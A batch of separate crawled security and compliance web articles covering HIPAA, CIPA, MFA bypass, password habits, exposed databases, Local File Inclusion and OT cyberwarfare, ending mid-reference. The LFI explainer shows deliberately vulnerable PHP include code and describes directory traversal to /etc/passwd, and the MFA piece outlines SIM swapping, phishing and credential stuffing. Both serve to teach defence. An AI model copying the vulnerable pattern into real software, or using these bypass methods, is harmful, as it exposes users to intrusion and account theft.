Improvement The security threat landscape is constantly changing, and your security posture must adapt and change in response. It’s not always easy to determine exactly how your security posture should change, which is why forward-thinking security leaders periodically invest in vulnerability assessments designed to identify security vulnerabilities that may have been overlooked. Once you have a list of security weaknesses you need to address, you can begin the process of proactively addressing them by configuring your security tech stack and developing new incident response playbooks. These playbooks will help you establish a coordinated, standardized response to security incidents and data breaches before they occur. Integration of Security Tools Coordinating incident response plans isn’t easy when every tool in your tech stack has its own user interface and access control permissions. You may need to integrate your security tools into a single platform that allows security teams to address issues across your entire network from a single point of reference. This will help you isolate and address security issues on IoT devices and mobile devices without having to dedicate a particular team member exclusively to that responsibility. If a cyberattack that targets mobile apps occurs, your incident response plan won’t be limited by the bottleneck of having a single person with sufficient access to address it. Similarly, highly integrated security tools that leverage machine learning and automation can enhance the scalability of incident response and speed up incident response processes significantly. Certain incident response playbooks can be automated entirely, providing near-real-time protection against sophisticated threats and freeing your team to focus on higher-impact strategic initiatives. Developing and Enforcing Security Policies Developing and enforcing security policies is one of the high-impact strategic tasks your security team should dedicate a great deal of time and effort towards. Since the cybersecurity threat landscape is constantly changing, you must commit to adapting your policies in response to new and emerging threats quickly. That means developing a security policy framework that covers all aspects of network and data security. Similarly, you can pursue compliance with regulatory standards that ensure predictable outcomes from security incidents. Achieving compliance with standards like NIST, CMMC, PCI-DSS, and HIPPA can help you earn customers’ trust and open up new business opportunities. AlgoSec: Your Partner in Network Security Protecting against network threats requires continuous vigilance and the ability to adapt to fast-moving changes in the security landscape. Every level of your organization must be engaged in security awareness and empowered to report potential security incidents. Policy management and visibility platforms like AlgoSec can help you gain control over your security tool configurations. This enhances the value of continuous vigilance and improvement, and boosts the speed and accuracy of policy updates using automation. Consider making AlgoSec your preferred security policy automation and visibility platform.
<urn:uuid:828fed69-801b-4705-8f2c-48a2b17e4f88>
CC-MAIN-2024-38
https://www.algosec.com/blog/network-security-threats-solutions/
2024-09-13T02:05:12Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00707.warc.gz
en
0.931875
2,978
2.90625
3
The Health Insurance Portability & Accountability Act (HIPAA) passed in 1996. Its purpose is to regulate how healthcare entities use & disclose Protected Health Information (PHI). HIPAA Technical Safeguards are in place to keep private information properly protected. Without these guidelines, PHI can fall into the wrong hands. This blog focuses on specific aspects of The Security Rule and how HIPAA Technical Safeguards keep your information secure. The HIPAA Security Rule There are three general rules outlined under HIPAA- The Privacy Rule, The Security Rule, & The Breach Notification Rule. Each one serves a unique purpose in regard to safeguarding PHI. The Security Rule requires implementation specifications, such as security software and or procedural access control, that uphold the integrity of PHI. The Privacy Rule The Privacy Rule protects the confidentiality & integrity of a patient’s private medical information. It advocates for patient’s rights by regulating who can access PHI and under what circumstances it can be disclosed. The Security Rule The Security Rule specifically focuses on safeguarding Electronic Protected Health Information (ePHI). It establishes security standards HIPAA covered entities must implement & maintain to keep electronic health records secure. The Breach Notification Rule The Breach Notification Rule requires that a Covered Entity (CE) and their Business Associate (BA) properly notify affected individuals in the event of a data breach. This rule only applies if there has been a compromise of improperly secured health information. Technical Safeguards are: Under HIPAA’s Security Rule, there are Physical, Administrative, and Technical Safeguards. HIPAA law recommends safeguards such as integrity controls, unique user identification, risk analysis, and hiring security personnel to record and examine activity. These security standards are a guide for HIPAA covered entities that handle PHI regularly. This means that while they are not required to implement every single one of these policies, they are highly recommended and upheld as a best data security practice. Physical Safeguards are designed to protect the building where tangible assets and resources are stored. The size of the facility or organization determines the scope and stringency of the enforced Physical Safeguards. Administrative Safeguards, on the other hand, pertain to office staff in the workplace where PHI is stored. These policies and procedures ensure that employers properly train and educate employees in regard to handling PHI. If PHI is altered or destroyed, for example, the office staff should know how to properly dispose of it. Finally, Technical Safeguards, as mentioned above, apply exclusively to ePHI. Technical Safeguards are in place to ensure the technology that hosts ePHI is properly secured. Data encryption and decryption, for instance, is a great way to secure ePHI via email because it makes data anonymous to a hacker who may be trying to infiltrate your inbox. HIPAA Technical Safeguards are not meant to make navigating technology more difficult. Rather, they represent good business practices for HIPAA covered entities through reasonable and appropriate technology solutions. Technical Safeguards Examples: HIPAA law does not require a CE to follow any specific set of Technical Safeguards to remain compliant. The CE has discretion over the security methodology they feel is right for their organization. However, the law does require that the security methods they choose to be both reasonable and appropriate. Some examples of Technical Safeguards under HIPAA’s Security Rule may include: - Data Encryption - Multi-Factor Authentication - Strong Log-On Credentials or Passwords - Private DNS Servers - Systems to Track & Monitor ePHI Access What is the Purpose of Technical Security Safeguards? After reading this information about HIPAA Technical Safeguards, you may be wondering… “Why does this matter to me?” Business owners and healthcare professionals should protect their patients’ health data at all costs. Technical Safeguards were written to guide HIPAA covered entities with the best practices and policies to achieve this goal. HIPAA compliance avoids legal penalties and builds trust with patients. If you are a CE or third-party BA, you probably deal with sensitive information often. You could be emailing medical records to a colleague or messaging a patient. Regardless, HIPAA covered entities should place a high priority on protecting their ePHI. As such, it is extremely important to implement proper security measures to safeguard this data. If a CE does not properly safeguard data, they face the high risk of a data breach. When unauthorized personnel access PHI, they can use it to exploit you & your patients. Secure Your ePHI with EnGuard®! At Enterprise Guardian, data security is our top priority. That is why we’ve integrated HIPAA Technical Safeguards into our lines of service. As certified HIPAA security experts, we understand how important it is for someone to keep their private information properly safeguarded. Technical Safeguards such as data encryption, private DNS servers, and more are an integral part of our security services. This is because we firmly believe in our ethical responsibility to uphold the integrity of your private data. To learn more, check our pricing page for a suitable plan that meets your needs!
<urn:uuid:a84e6b05-34da-4c23-8bd3-635b62f6e39c>
CC-MAIN-2024-38
https://www.enguard.com/hipaa-technical-safeguards/
2024-09-18T01:32:15Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00307.warc.gz
en
0.918547
1,076
2.75
3
How Fraudsters Bypass MFA to Get into Banks, Brokers and Crypto Wallets Passwords are dying as a sole security measure, particularly within financial services. It is widely expected (and in the UK, mandatory) that any institution responsible for finances, from banks to brokers and even crypto wallets, should be implementing multi factor authentication (MFA) to prevent fraudsters gaining access to accounts using automated attacks, even if they know the user’s password. This blog post outlines several MFA bypass techniques attackers have developed to carry out account takeover attacks on financial services organizations. What is MFA (multi factor authentication)? MFA – or multi factor authentication – is a security measure designed to prevent unauthorized access to accounts, even when the attacker has the user’s password. Any login requires an MFA access code (like a one time password) generated on a device belonging to the account owner using a third party MFA provider app like Google Authenticator or Authy. In theory only the account owner can access the code and log in, even if their credentials are compromised by a bad actor. 2FA (two factor authentication) is a type of MFA that uses exactly two factors for login (usually credentials plus a device). The second factor could be a code sent via a text message or to an app. All 2FA is a form of MFA, but not all MFA is two factor authentication as more factors could be required. How is cryptocurrency stolen? The nature of blockchain currencies makes them highly susceptible to fraudulent activity. Transactions are difficult if not impossible to trace, making it easy for adversaries to get away with stealing large amounts of virtual cash undetected. Between October 2020 and March 2021, 7,000 people reported a collective $80 million stolen in cryptocurrency – 12 times the number of reports than in the same period the previous year, with over 1,000% more money stolen. Here are some of the most prevalent types of cryptocurrency fraud: Guru cons and investment scams As people are drawn into the hype around making money through crypto investments, inevitably so-called “crypto gurus” have found a niche selling advice to newcomers. Sadly, fraudsters have taken advantage of the situation. In one scam, more than $2 million was stolen by fraudsters impersonating cryptocurrency advocate Elon Musk. These con artists promised to multiply the victims’ investments, but instead stole the money with no hope of retrieval. The difficulty in tracing transactions makes cryptocurrency a perfect tool for romance scammers who manipulate their victims into transferring huge sums of cash. The FTC reports that over $185 million has been lost via cryptocurrency transactions in romance scams since 2021 – one in every three dollars lost to the scams overall. Unlike traditional banking, crypto transactions are hard to reverse or trace. There is little support due to the decentralized nature of the currencies; password recovery mechanisms are less robust than traditional banks, and repatriating stolen accounts is harder as proving yourself to be the legitimate account owner is not straightforward. These factors make cryptocurrency wallet fraud attractive to ATO attackers where risk and cost are low but potential rewards are extremely high. Account takeover is still a major concern in financial services Account takeover (ATO) is the holy grail of fraud attacks in financial services, handing criminals their victims’ financial assets on a platter. The risk of accounts being stolen affects both traditional banks as well as FinTechs and crypto wallets. The first step in most attempts to gain access to bank accounts is credential stuffing. MFA is a way to stop attacks like credential stuffing. How can credential stuffing give access to a user’s account? First, the attacker acquires a list of credentials (username and password pairs), usually through some form of credential theft. This could either be a data leak from another site published on the dark web, or by buying ‘botnetted’ device fingerprints and session cookies from marketplaces like the Genesis Market. If only part of credentials is obtained, attackers can use brute force to guess the password based on published lists. Next, threat actors inject these credentials into the login pages of a targeted company to determine which ones are legitimate. This is usually done at great velocity and volume using bots to automate the process. Some attacks make millions of login attempts within just a few hours, so even a small success rate at this scale can yield hundreds or thousands of accounts, which is a big win for criminals. Any validated credentials can then be used for an account takeover attack. Once in, threat actors can access sensitive data, perform a password reset and completely control the user account, even transferring money elsewhere. How to protect your crypto wallet from thieves In cryptocurrency terms, your wallet’s private key is your money, so anyone who has access to it essentially has access to your funds. Private keys are frequently encrypted by a password so keeping both safe is essential. Here are a few precautions you need to consider to secure your cryptocurrency. Use multifactor authentication using an app Multifactor authentication (MFA) is an additional step to protect accounts that may have their passwords compromised, adding an extra hoop for criminals to jump through. However, with an attractive reward inside your crypto wallet, there are ways around SMS verification as a form of MFA. If an adversary knows your phone number along with other PII to get past security questions (often obtained through social engineering), they can fool your mobile network provider over the phone in an attack called phone porting. The network is persuaded to swap the victim’s SIM card to another phone, allowing the attacker to access SMS verification and clear MFA. The solution is to use dedicated authenticator apps like Google Authenticator or Authy instead of just a phone number as multifactor authentication. Use a strong, unique password, or even separate email addresses for each wallet If an attacker gains access to one account, quite often they can access other accounts owned by the same person due to many people reusing the same passwords. This is unsurprising since the average person has 191 passwords to remember for their online accounts. The way to protect against this is to always use a strong, unique password for every service. Password managers are an essential tool for this purpose, ensuring only strong passwords are generated and keeping them safe with one master password. You must be extremely careful with any password storage you rely on, as there is no way to recover lost passwords for crypto wallets due to the decentralized nature of cryptocurrency. You might also want to create a totally separate email address for each crypto wallet, so there is even less risk of losing access to your whole balance should one service be compromised. Protect your private key with cold storage Your public key is like an address others use to transfer money to your account, while you need your private key to send money to others. It’s essential to keep your private key away from prying eyes. Cold storage is one way to achieve this. Cold storage of a private key involves physically writing down the key on a piece of paper, locking it away in a safe or deposit box, and erasing all digital traces of it. Just be extremely careful you don’t lose this physical copy or put it anywhere it can be lost, destroyed or stolen. Use a hardware wallet A similar tactic to cold storage of your private key is using a hardware (or cold) wallet. These are physical devices which cryptocurrency can be transferred onto, which are then kept offline, like withdrawing cash from an ATM and keeping it in a traditional wallet. The advantage of doing this is it keeps your balance offline and safe from being withdrawn remotely by anyone else. But, as with a traditional wallet, theft is always possible, and if lost, the funds on the device will be irretrievable. How can multi factor authentication stop credential stuffing and account takeover? MFA is designed to stop ATO attacks by requiring more than just a password (usually something in the account owner’s physical possession) to validate a login, preventing automated attempts. Unfortunately, attackers can bypass MFA security using a combination of bot and human intervention, either by sidestepping the need to use MFA for account access or using clever tricks to fool account owners into handing over MFA codes. How do attackers bypass MFA? Here are some common MFA bypass attack vectors: Financial aggregator sites APIs are a huge target for financial fraudsters, as the adoption of Open Banking API to meet PSD2 requirements opened a new attack vector. APIs are exploitable via financial aggregator sites. Bank customers use services such as Mint, Plaid and Yodlee to manage their finances, aggregating accounts into a ‘single pane of glass’ view. These apps can access account information and even make changes using the bank’s API or a webapp, sometimes without requiring MFA. A threat actor can perform credential stuffing attacks through a third-party financial aggregator app to bypass MFA controls. Security questions and social engineering Some banks make provisions in case their users lose the device used for MFA, or don’t have access to it for some reason. This is a way to bypass MFA using the bank’s own policies. The most common method of verifying identity in this case is through security questions. Attackers use social engineering, which can be as simple as quickly looking at social media profiles, to gain answers to common security questions and access accounts without MFA. Bots can therefore use credential stuffing to bypass MFA and instead answer security questions either by brute force or using publicly available data. MFA bypass attacks often run in parallel with phishing attacks. Phishing is a means to trick users into giving up sensitive information, such as passwords or information useful for passing security questions. Phishing can also be used to extract codes generated by MFA apps from account owners. Techniques include trying to convince an individual to visit a fake login page and input the MFA code. The threat actor might also email or phone an individual and impersonate their bank to ask for the MFA code. In this way, rather than bypass MFA, attackers gain access to MFA codes maliciously. In a man-in-the-middle (MITM) attack, the threat actor positions themselves between the bank and the customer (often by using malware) and intercepts the messages between them. They can use this to acquire an MFA code, for example by linking to a fake page asking for the MFA code. SIM swapping entails intercepting text messages sent to a user’s phone number and having them sent to another handset. This is often done by calling up the user’s SIM provider and impersonating the customer using social engineering to pass security questions. The threat actor then convinces the operator to swap the phone number to a new SIM card in the attacker’s possession. Once this is set up, the threat actor can use this phone number as the authentication factor to gain access to the user’s account. Why can’t MFA completely stop bot attacks? While we have presented a few ways fraudsters get around MFA defenses, it’s true that MFA is stronger than passwords alone, and is still likely to slow down attacks, force a degree of human intervention, or yield fewer stolen accounts. However, because they can run at such high volumes, bots don’t need a very high success rate to be profitable. Banks are still at risk of having customer accounts stolen by bot attacks, even with MFA in place. In essence, adding an extra layer of defense has forced criminals to become even more sophisticated in the ongoing cat and mouse chase between security experts and their adversaries.
<urn:uuid:db33e24e-749c-444e-b60a-13786e5daf16>
CC-MAIN-2024-38
https://netacea.com/blog/how-fraudsters-bypass-mfa-to-get-into-banks-brokers-and-crypto-wallets/
2024-09-20T13:46:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652278.82/warc/CC-MAIN-20240920122604-20240920152604-00107.warc.gz
en
0.945039
2,429
2.578125
3
The Children’s Internet Protection Act and Its Implications The Children’s Internet Protection Act or CIPA for short is a federal law passed in 2000 that addressed concerns relating to children’s access to harmful, offensive, or obscene content that may be viewed while using the internet. As opposed to the Children’s Online Privacy Protection Act or COPPA, the CIPA focuses on children’s internet use and access in the context of libraries and schools. As such, the CIPA imposes certain requirements on schools and libraries that receive discounts for internal connection or internet access through the E-rate program, a federal government program that makes certain communications services and products more affordable for eligible schools and libraries. The federal government enforces compliance with the CIPA by linking it to the E-rate program, and retains the right to restrict or rescind funding if this compliance is not met. What are the requirements of the CIPA? School districts and libraries who are subject to the CIPA are not eligible to receive the discounts offered through the E-rate program unless they first certify that they have developed an internet safety policy that includes various technology protection measures. These protection measures must block or filter internet access to pictures or images that contain obscenities, child pornography, or any other visual content that could be harmful to minors. Prior to adopting an internet safety policy, schools and libraries must first provide reasonable notice and hold at least one public meeting or hearing to address the proposal. This being said, schools and libraries creating their own internet safety policies are not deemed as being enough to remain compliant with the CIPA. In order to maintain CIPA compliance, schools and libraries must ensure that their internet safety policies contain the following key functions: - Internet filtering – internet filtering is a protection measure applied to all computers that will be accessed by students. This technology must block harmful internet items such as pornography or any other online content that me be deemed obscene or offensive. - Internet monitoring – schools and libraries must monitor online activities to ensure that students are not engaging in harmful activities or behavior. This can include cyberbullying, the purchase of illegal substances, radicalization, or self-harm. - Communications safety – this includes safe access to email, forums, chat rooms, forums, and other forms of electronic communication. - Unauthorized access – schools and libraries must ensure that they provide protection and supervise students to prevent hacking and other forms of illegal online activity. - Unauthorized disclosure – schools and libraries must provide protection against the illegal disclosure and use of the personal information of minors. - Education – schools and libraries must provide educational information to minors concerning digital citizenship, such as cyberbullying awareness and how to properly interact on social media platforms and networks. While schools and libraries who receive funding through E-rate programs are required to monitor the online activities of children, they are not required to track this information. Additionally, the CIPA does not apply to schools and libraries who receive E-rate program discounts for telecommunications purposes only. Furthermore, an authorized person within a school or library may disable any internet block or filtering features for the purposes of research or other lawful activities that they deem necessary. While the primary penalty that can be levied against schools and libraries who are to be in non-compliance with the CIPA is the loss of funding, there are serious legal consequences that can result from providing false information or certifications to the federal government in any context in which they operate. While the internet has changed tremendously in the 21 years since the CIPA was initially passed, the need to restrict what children can access when using the internet remains a concern of many parents, educators, and policymakers alike. To this end, the CIPA was amended in 2011, to include social media websites and other online entities that either did not exist or were not as prominent in 2001 as they were in 2011 are continue to be in the present. What’s more, the nature of harmful online activities such as cyberbullying have also changed due to the rise of such online sites. Despite all of this, the CIPA remains as a legislative measure that protects children when using the internet at the library or in school.
<urn:uuid:33aeccbd-5b73-4b3d-9bc7-65d5855edf9e>
CC-MAIN-2024-38
https://caseguard.com/articles/what-is-cipa/
2024-09-09T16:04:31Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00207.warc.gz
en
0.951817
863
3.578125
4
MDM Storage is created automatically when the server starts for the first time, and the generation of the structures for the storage is based on the defined model. The MDM Storage structure is transparent to users while the implementation details of the structure are completely hidden. MDM storage includes a repository of cleansed, matched, and mastered data consisting of the following: The current data repository stores the instance records, or source records, from the different source systems. Storing data from the source systems has a critical purpose and provides many benefits. All records from the source systems are stored in their cleansed form, which allows systems to retrieve cleansed versions of their own records, and comparison against existing data is done when receiving updates. This makes it possible to efficiently handle updates in MDM and cross-system distribution of source records. The Matching Key tables for all matched entities. These tables enable incremental matching, as well as identification of records when used as a service. Other technical tables. The historical data repository stores previous versions of both instance and master data. History contains data in a defined scope (specified entities, specified columns) and in defined frequency (all changes vs. change triggered by some specified columns). Data is stored as BLOBs. The MDM storage relies on a database and is platform-independent. All databases commonly found in the enterprise are supported as long a JDBC driver is available for them. However, some databases allow for performance optimization techniques, so a selection of those technologies for the MDM storage is recommended. The MDM storage tables should not be accessed directly. Instead, the user should use only the online or batch interfaces to interact with the MDM repositories. The use of logical transactions is another reason to rely only on the standard interfaces to access the MDM repositories. Was this page useful?
<urn:uuid:5e1406d6-24e3-49cc-b3d6-58ab654554a1>
CC-MAIN-2024-38
https://docs.ataccama.com/mdm/13.4.x/product-overview/mdm-storage.html
2024-09-12T01:53:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00007.warc.gz
en
0.91605
375
2.640625
3
The 6 Bad Habits Hackers Love If you want to protect your data and accounts, you really have to think like the enemy… There’s no doubt about it: hacking is on the increase. According to Symantec’s annual Internet Security Threat study, there were nearly a million new malware threats released every day in 2014 – from viruses and spyware to trojan horses and other malicious programs. While ransomware attacks – where access to a computer is restricted by hackers until a fee is paid – increased by 113 percent. And it costs us all money: McKinsey & Company estimates that cyber attacks will slow the pace of technology and business innovation over the next few years and cost the economy as much as $3 trillion annually. So defeating the cyber criminals should be a priority for all of us. To do that, however, we have to get into the mind of the hacker – to analyse the security gaps they’re looking for. And understand that, in terms of passwords, they’re desperately hoping we’ve picked up some bad habits. Such as… - We’ve gone “short & simple” They’re easier to remember, perhaps, but in terms of data security, a short and simple password is also far easier to hack with what are called brute-force attacks – where all possible keys or passwords are tried until the correct one is found. The key is build what is called ‘entropy’ by choosing passwords with more than eight characters and adding “special characters” (such as capital letters, symbols etc). Or better still, a truly random password – something that, of course, Dashlane can help you with… - We let our fingers do the walking A recent investigation of 15 million accounts by hosting platform WP Engine revealed an odd habit – that while many people had seemingly random passwords (such as “qaz2ws” or “adgjmptw”), they’d chosen them by typing simple patterns on their keyboards. But beware: password crackers such as Passpat use keyboard layouts and clever algorithms to measure the likelihood that a password is made from a keyboard pattern. - We’ve left clues everywhere Being sentimental old fools, we’re very likely to create passwords from details of our own lives – such as our birthdates, pets, mother’s maiden name, favorite football team and so on. However, this leaves us vulnerable to what’s called social engineering, where many of these details are also available on social media (e.g. Facebook). This makes it simple for hackers to sift through these biographical clues and work out the ‘base phrase’ that you’ve based password on – and then gain access via what is called a dictionary attack. Only random words – or, better still, randomly generated alphanumeric sequences – are truly safe enough. - We think we’ve been clever Many of us attempt to build entropy by choosing a simple phrase – and then complicating it by using a combination of upper and lower case letters or tran5p05ing numb3r5 f0r l3tt3r5. But analysts found that even supposedly sophisticated passwords used obvious base phrases such as “password” or “qwerty” as their base. Which is all hackers need. Purpose-built password-breaking software such as HashCat is wpengine.com/unmasked capable of taking 300,000 guesses at your password a second – by taking common base phrases like these and trying obvious variations and permutations. - We happily use public WiFi Jumping on the free WiFi connection your local coffee shop, at the airport or even in your building seems innocuous – but it can leave you vulnerable to a method of hacking known as a man-in-the-middle attack. In simple terms, this is a situation where a malicious eavesdropper (the “man in the middle”) is able to read (or write) data that is being transmitted between you and the website you’re browsing. Meaning your data, emails and keystrokes could be intercepted without you knowing. Eliminate the risk of this by avoiding Wi-Fi connections that aren’t yours and deleting these networks from your devices – but also make sure your Wi-Fi connection is secured with a unique, private password. - We’ve never deleted our old login emails On average, we each now possess more than eighty different password-protected accounts – everything from social networking to home deliveries. So it’s understandable that many of these login details will still be stored on your main email account in the form of the signup emails you were sent when you joined. But what happens if that email is compromised? For the hacker, your email is a goldmine. Services like Unroll.me will quickly identify unwanted subscriptions and unsubscribe you from dormant accounts.
<urn:uuid:5d5d28d1-d07a-4851-b0ff-d2601f49e07e>
CC-MAIN-2024-38
https://www.dashlane.com/blog/the-6-bad-habits-hackers-love
2024-09-15T16:37:59Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651632.84/warc/CC-MAIN-20240915152239-20240915182239-00607.warc.gz
en
0.953153
1,026
2.671875
3
Database Port Exposed to the Internet Category | SECURITY_MISCONFIGURATION | Base Score | 3.0 | A database service is exposed to the internet. Attackers often gain access to databases through credential attacks by obtaining passwords leaked in data breaches and by password spraying weak passwords. This access allows attackers to steal or ransom off data contained within the database. In some cases, database access can lead to host compromise as well.
<urn:uuid:457b504f-ed64-4b07-99e2-3586656c89f0>
CC-MAIN-2024-38
https://docs.horizon3.ai/knowledge_base/weaknesses/H3-2022-0006/
2024-09-16T22:36:37Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00507.warc.gz
en
0.909817
93
2.8125
3
An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement. Local File Inclusion is very similar to Remote File Inclusion (RFI). However, an attacker using LFI may only include local files (not remote files like in the case of RFI). The following is an example of PHP code that is vulnerable to LFI. * Get the filename from a GET input * Example - http://example.com/?file=filename.php $file = $_GET['file']; * Unsafely include the file * Example - filename.php include('directory/' . $file); In the above example, an attacker could make the following request. It tricks the application into executing a PHP script such as a web shell that the attacker managed to upload to the web server. In this example, the file uploaded by the attacker will be included and executed by the user that runs the web application. That would allow an attacker to run any server-side malicious code that they want. This is a worst-case scenario. An attacker does not always have the ability to upload a malicious file to the application. Even if they did, there is no guarantee that the application will save the file on the same server where the LFI vulnerability exists. Even then, the attacker would still need to know the disk path to the uploaded file. Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows. In the above example, an attacker can get the contents of the /etc/passwd file that contains a list of users on the server. Similarly, an attacker may leverage the Directory Traversal vulnerability to access log files (for example, Apache access.log or error.log), source code, and other sensitive information. This information may then be used to advance an attack. Finding and Preventing Local File Inclusion (LFI) Vulnerabilities Fortunately, it’s easy to test if your website or web application is vulnerable to LFI and other vulnerabilities by running an automated web scan using the Acunetix vulnerability scanner, which includes a specialized LFI scanner module. Request a demo and find out more about running LFI scans against your website or web application. Frequently asked questions LFI is a web vulnerability caused by mistakes made by a programmer of a website or web application. If an LFI vulnerability exists in a website or web application, an attacker can include malicious files that are later run by this website or web application. Luckily, LFI is not a very common vulnerability. According to the latest Acunetix Web Application Vulnerability Report, it is present on average in 1% of web applications. LFI can be dangerous, especially if combined with other vulnerabilities – for example, if the attacker is able to upload malicious files to the server. Even if the attacker cannot upload files, they can use the LFI vulnerability together with a directory traversal vulnerability to access sensitive information. The most efficient way to detect LFI is by using an automated vulnerability scanner. You can of course detect such vulnerabilities through manual penetration testing but it takes a lot more time and resources. To avoid LFI and many other vulnerabilities, never trust user input. If you need to include local files in your website or web application code, use a whitelist of allowed file names and locations. Make sure that none of these files can be replaced by the attacker using file upload functions. Get the latest content on web security in your inbox each week.
<urn:uuid:439192e1-035f-4f0a-94a8-5403770bdba8>
CC-MAIN-2024-38
https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/
2024-09-16T22:09:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00507.warc.gz
en
0.906
826
2.921875
3
First of all I will try Explain what the Hacking really is…. What Is Hacking?? Everyone Here thinks that hacking is just stealing of data and information illegally but this perception is absolutely wrong. The below is definition from Wikipedia…. Itz clearly showing hacking as a negative thing… “Hacking is unauthorized use of computer and network resources. (The term “hacker” originally meant a very gifted programmer. In recent years though, with easier access to multiple systems, it now has negative implications.)” Hacking is not always unauthorized… Hacking also include Exploring the Things that are being Hidden from the general usage… So exploring things i.e being Hidden from general User is also hacking… Hacking Definition by Me… ” Hacking is art of exploring the hidden things that are being hidden from general usage and finding loop holes in the security and use them to benefit the others” WHO ARE HACKERS ?? Everybody here thinks thats hackers are criminals of the virtual world (i.e digital World ). But this thought is also wrong. Hackers are not always criminals.. It doesn’t have any doubt that Hackers are extremely genious peoples in the field of Computers… I want to Categorize hackers in three Categories: 1. Crackers or Black Hat hackers or cheaters or simply criminals : They are called criminals because they are having the mindset of causing harm to security and they steals very useful data and use it in wrong ways. Phishers also some in this category who steals account info and steal your credit card nos. and money over the Net. 2. Ethical hackers : Ethical Hacking Means you think like Hackers. i.e First you Hack the Systems and find out the loop holes and then try to correct those Loop Holes..These type of hackers protect the cyberworld from every possible threat and fixes the future coming security loop holes. These peoples are also called as “GURU’s” of Computer Security. 3. Simply Prankers : The hackers who just do hacking for fun…play pranks to their friends.. INTRODUCTION TO SIMPLE TERMS RELATED TO HACKING ! Threat –An action or event that might compromise security. A threat is a potential violation of Vulnerability –Existence of a weakness, design, or implementation error that can lead to an unexpected, undesirable event compromising the security of the system. Exploit –A defined way to breach the security of an system through vulnerability. i.e Use the vulnerability to damage the database or system. Attack –An assault on system security that derives from an intelligent threat. An attack is any action that violates security. Target of Evaluation –An IT system, product, or component that is identified/subjected as requiring security evaluation. Security – A state of well-being of information and infrastructures in which the possibility of successful yet undetected theft, tampering, and disruption of information and services is kept low or tolerable. Security rests on confidentiality, authenticity, integrity, and availability. •Confidentiality –The concealment of information or resources. •Authenticity –The identification and assurance of the origin of information. •Integrity –The trustworthiness of data or resources in terms of preventing improper and unauthorized changes. •Availability –The ability to use the information or resource desired. INTRODUCTION TO TOPICS THAT WE COVER IN THESE CLASSES ! - Introduction to Ethical hacking - Hacking Systems and OS - Trojans and backdoors - Sniffers and DDOS(Denial of Service) - Social Enginnering - Hacking Websites - Hacking Web applcations and Softwares - Password Hacking and Cracking - Phising and fake pages - SQL Injection - Hacking Wireless (wifi’s) - virus and worms - Creating Viruses and trojan and Making them undetectable - Exploit Writing and virus source codes of very famous viruses - Hacking Webservers - …… And Much more… List is endless… I think You all would have like this and want to see more.. I will regularly post material. I think this deserves Comments and facts that Users want’s to ask about Hacking… So Don’t hesitate and ask your queries . I am there to reply them all… Have Fun and Keep Learning…. As Hacking is the art of expertising Computers…
<urn:uuid:d176aee4-f67d-4970-825e-e720387d3181>
CC-MAIN-2024-38
https://www.hackingloops.com/hacking-class-1-introduction-to-hacking-and-hackers/
2024-09-16T23:45:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00507.warc.gz
en
0.906607
945
2.890625
3
When describing the war in Ukraine recently, NPR’s cybersecurity correspondent, Jenna McLaughlin, stated this: “It’s now been 18 months of fighting. The focus has rightfully been on dead and wounded, but there’s still real concern about how sophisticated cyberattacks paired with things like missiles and drones can inflict real damage. That’s especially true with the power grid, an increasing concern as Ukraine prepares for another harsh winter. While some Ukrainians are fighting on the frontlines, others are using their digital skills to volunteer. And that includes career cybercriminals.” Russia, Ukraine, and OT Cyberattacks What this ongoing conflict has taught us is that cybersecurity has become another battlefront, and some of the prime targets are critical infrastructure operators. Even before the official start of the war, Russia had been poking hard at Ukraine for the past several years via cyberattacks on the country’s critical infrastructure. But when the world’s foremost on cyber stepped up to assist Ukraine to both understand what happened during those incidents and to lend assistance to prevent them, it seemed that Russia decided to test new ways to infiltrate OT. In. In fact, Mandiant just uncovered OT attacks that Russian group Sandworm executed against Ukraine in October of last year. According to Security Week’s reporting, Sandworm cracked an “end-of-life MicroSCADA control system and issuing commands,” which led to disruptions including a power outage. Researchers into the Russian case note that this type of methodology represents a rising sophistication in OT cybercrime capabilities, which is a trend that is only likely to expand in 2024. Google Cloud’s new global Cybersecurity Forecast raises concerns over nation-state actors. In addition to interest in the United States’ 2024 election, the forecast warns that cyberattackers may employ such tactics as wiper malware, sleeper botnets, and zero-day exploits to mount ambushes. But one tech emergence that could really fuel activity is generative AI. While Google Cloud predicts that generative AI will play a larger role for threat actors, it may also be a useful tool in defending against attacks. Israel, Hamas, and Cybersecurity Unfortunately, we now have another war where we could possibly see all or some of this play out. The world has now witnessed more than a month of fighting between Israel and Hamas. In this time period, security teams have recorded an increase in cyberattacks against Israeli businesses, government agencies, and energy and telecommunications organizations. Politico also reports that hacking campaigns led by groups potentially connected to Iran and Russia before the October 7 strike by Hamas attempted to impact websites, the Israeli electric grid, and a missile defense system. Although the cyber warfare that has unfolded in the Russian and Ukrainian conflict has yet to occur with Israel and Hamas, the worry is certainly there. And with advanced methods available and risk to OT networks, the call to action to implement strong cybersecurity measures has never been louder. Therefore, large-scale efforts such as the NSA’s guidance to enhance OT and OSS security as well as private sector products designed specifically to protect OT and IT environments like those offered by DYNICS are more important than ever. - “An inside look at Ukraine’s cyber war with Russia” – Jenna McLaughlin, NPR https://www.npr.org/2023/09/04/1197548380/an-inside-look-at-ukraines-cyber-war-with-russia - “Russian Hackers 